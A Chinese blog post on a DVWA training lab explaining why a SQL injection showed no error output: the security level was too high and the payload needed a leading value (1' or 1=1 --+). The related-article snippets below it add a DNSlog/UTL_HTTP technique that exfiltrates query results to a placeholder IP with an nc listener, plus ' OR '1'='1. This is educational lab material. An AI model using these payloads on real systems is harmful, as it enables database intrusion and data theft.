DVWA环境里,普通SQL注入没错误回显原因

已于 2023-03-01 08:36:16 修改
阅读量1.4k 收藏 6
点赞数 4
文章标签: sql 数据库 web安全 网络安全
于 2023-02-24 22:02:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43309162/article/details/129209057
版权

DVWA环境里,SQL普通注入没错误回显原因

省流:1.安全级别设置过高了

如图所示,在框内注入SQL语句点击提交
在这里插入图片描述

无事发生,没有任何错误回显,明明不是盲注啊,怎么回事呢?
在这里插入图片描述



其实真相只有一个,那就是dvwa安全级别设置太高了
在这里插入图片描述


把安全级别调到 low
再次输入刚才的语句试一次
在这里插入图片描述

在这里插入图片描述
可以看到有错误回显了。
事情就是这么简单。。。

或者:提交内容是空的

使用如下语句:
’ or 1=1 --+

没有动静
在这里插入图片描述

在前面填一个值:
1' or 1=1 --+


回显出来了。。
在这里插入图片描述

皮皮egg
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
26-3 SQL注入攻击 - SQL注入回显,盲注又被封怎么办?
weixin_43263566的博客
03-11 307
UNC路径的格式类似于。基于时间的盲注可以通过构造特定的SQL语句来判断条件是否成立,从而推测出数据库中的数据。盲注速度较慢且容易被WAF或防火墙封禁IP,因此利用DNSlog可以快速有效地获取数据,避免IP被封锁的情况。通过以上步骤,可以利用 DNSLog 平台或自行部署DNSLog来获取命令执行的回显信息,这在某些情况下可能用于安全测试或网络监控等需要的场景。需要注意的是,DNS查询过程中涉及到本地DNS服务器、根DNS服务器以及顶级域名服务器等不同级别的DNS服务器,通过逐级查询最终完成域名解析。
SQL注入(MySQL查询语句、URL编码、无回显
Hardworking666的博客
01-05 1882
文章目录MySQL常用查询语句注释URL编码 MySQL常用查询语句 select user(); 当前MySQL 登录用户名 select database(); 当前MySQL 数据库名 select version(); 当前MySQL 版本 select @@version; 当前MySQL 版本 select @@basedir; 当前MySQL 安装路径(MySQL安装目录) select(length..
2020-12-06-DVWAsql.md
01-24
dvwasql
sql注入回显应用情况
最新发布
weixin_74182283的博客
04-08 900
load_file为攻击的相关函数,利用concat函数将查询的version与使用的域名包含起来,其中‘\\\\’为转义字符,可以理解为转义\,输出两个\\ ,而使用\的原因也是为了模仿UNC的路径,后面那个.xxx为域名解析,而那个test则是随便输的一个文件,可以是不存在的,只是为了让查询的数据回显到dnslog上。盲注速度很慢,有时候需要一个一个字符去进行爆破,可以但不够高效,并且有时候防火墙还回去禁用ip,此时就可以考虑通过DNSLOG来快速的得到数据。站库分离(这是个作业,老师给的压缩包。
DVWA下的SQL注入
07-25
SQL
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
sql注入之页面不能回显(外带,Oracle)
weixin_42478365的博客
09-29 901
很多时候页面不能直接回显,如果是oracle数据库可以用UTL_HTTP将数据反弹到一个外网IP进行查看,具体步骤,如下: 第一步:使用nc监听数据 nc -lvvp 8888 第二步:反弹数据信息 and UTL_HTTP("http://IP:8888/" || (SQL语句))=1-- 判断是否存在UTL_HTTP select count(*) from all_objects where object_name="UTL_HTTP" ...
SQL注入-无回显】布尔盲注:原理、函数、利用过程
06-14 6388
SQL注入-无回显
SQL注入回显,利用DNSlog构造方式
m0_62207482的博客
03-17 290
防火墙的存在,容易被封禁 IP,可以尝试调整请求频率,有条件的使用代理池进行请求。
84.网络安全渗透测试—[SQL注入篇23]—[高级注入技巧-dnslog无回显注入]
qwsn
01-21 4311
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、高级注入技巧 dnslog无回显注入 1、原理 2、dnslog平台 3、MySQL dnslog无回显注入示例: 4、SQLSERVER dnslog无回显注入示例: 5、总结:
Sql注入基础复习
qq_49283465的博客
10-14 219
注入类型为’时,所构造的sql语句为’2’ and ‘1’=‘1’,返回的值为’2’,所以所查询的结果为id=2。注入类型为’)时,所构造的sql语句为(‘2’ and ‘1’=‘1’),这时会把括号内的值当做布尔值处理。2’ and ‘1’=‘1,若返回结果为id=2时的值,则说明注入类型为’,若返回结果为id=1时的值,说明注入类型为’)闭合方式’ " () (‘x’) ((‘x’)) (“x”) ((“x”)) (()) ‘%x%’-------
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
web基础漏洞之SQL注入漏洞
m0_62274649的博客
10-04 950
sql漏洞基础,仍需完善
SQL注入-无回显】时间盲注:原理、函数、利用过程
06-14 5234
SQL注入-无回显
SQL注入回显)-DVWA
xy_sugar的博客
01-23 2531
概述 LOW等级 1、首先尝试正常操作,输入1 可是这web应用通过查询数据库,获取了id为1的用户的信息,猜测SQL语句为: 2、接下来检测是否存在SQL注入漏洞,输入1’   报错,则说明单引号注入到SQL语句中报错,存在SQL注入漏洞 尝试数字型,查询结果与id=1时的结果一样 尝试第二种情况,成功执行 尝试双引号,也有成功 所以可知这...
WEB安全 SQL注入
2301_79827966的博客
11-04 55
题目来源首先试出数据库有多少个字段,先输一个1试试发现可以回显,再输一个2试试发现仍然可以回显,再试一个3发现不能正常回显,说明该数据库只有两个字段接下来开始查询information_schema.schemata中数据库的名字发现只回显出了一行数据,这时可以采用group_concat()使得查询出来的所有数据库回显在一行上这要注意,使用union联合查询语句时,只有当前面的select语句不为真时,才会执行后面的语句,否则后面的语句不会执行。
sql注入之查询方法和报错盲注 (16)
san3144393495的博客
04-24 618
当我们进行注入的时候,有很多注入会出现无回显得情况,就在注入的时候有报错信息和一些东西给予提示的,这种情况是无回显,在前期的注入就办法执行,我们需要他报出相关的数字,便于我们查询一些参数,如果出现无回显的情况就变过进行了。出现这个无回显原因,可能是sql查询方式有问题所导致的, 第二个原因是对方在sql语句执行之后这个结果显示它有一些显示上面的代码,他这个显示代码写的不当,不好,或者直接写,也会导致这种无回显。一般结合表名和列名进行数据排序操作。会员或后台数据同步或缓存操作。
SQL注入的一些示例及解决SQL注入的方法
weixin_43618785的博客
03-09 8511
解决SQL注入的方法
dvwa靶场中初级sql注入
07-28
DVWA(Damn Vulnerable Web Application)靶场中,初级SQL注入是一种常见的漏洞类型。SQL注入是一种攻击技术,通过在Web应用程序中注入恶意的SQL代码来绕过应用程序的安全控制,从而获取非法访问或执行未经授权的操作。 下面是一些在DVWA靶场中进行初级SQL注入的步骤: 1. 登录DVWA:首先,登录到DVWA靶场。你可以在浏览器中输入`http://localhost/dvwa/login.php`,然后使用默认的用户名和密码登录(默认用户名:admin,密码:password)。 2. 设置安全级别:DVWA有不同的安全级别可供选择。在这个例子中,将安全级别设置为"低"。你可以在页面顶部的安全选项中找到并选择安全级别。 3. 选择"SQL Injection":在DVWA的主菜单中,选择"SQL Injection"。这将带你进入一个页面,你可以在这个页面上进行SQL注入攻击。 4. 探测注入点:在页面上,你将看到一个输入框,用于输入用户ID。首先,尝试输入一个常规的用户ID(如1)并提交表单。观察页面的响应,看是否存在任何异常或错误信息。如果有出现错误,则说明该输入点可能存在注入漏洞。 5. 进行注入攻击:在用户ID输入框中,尝试输入一些注入代码,如`' OR '1'='1`。这是一种常见的注入技巧,目的是绕过应用程序的验证逻辑。提交表单并观察页面的响应。如果页面显示了所有用户的信息,说明注入成功。 请注意,这只是一个简单的示例,实际的SQL注入攻击可能更加复杂。在实际环境中,进行SQL注入攻击是不道德和非法的,除非你有合法的授权和目的。在学习和测试过程中,务必遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值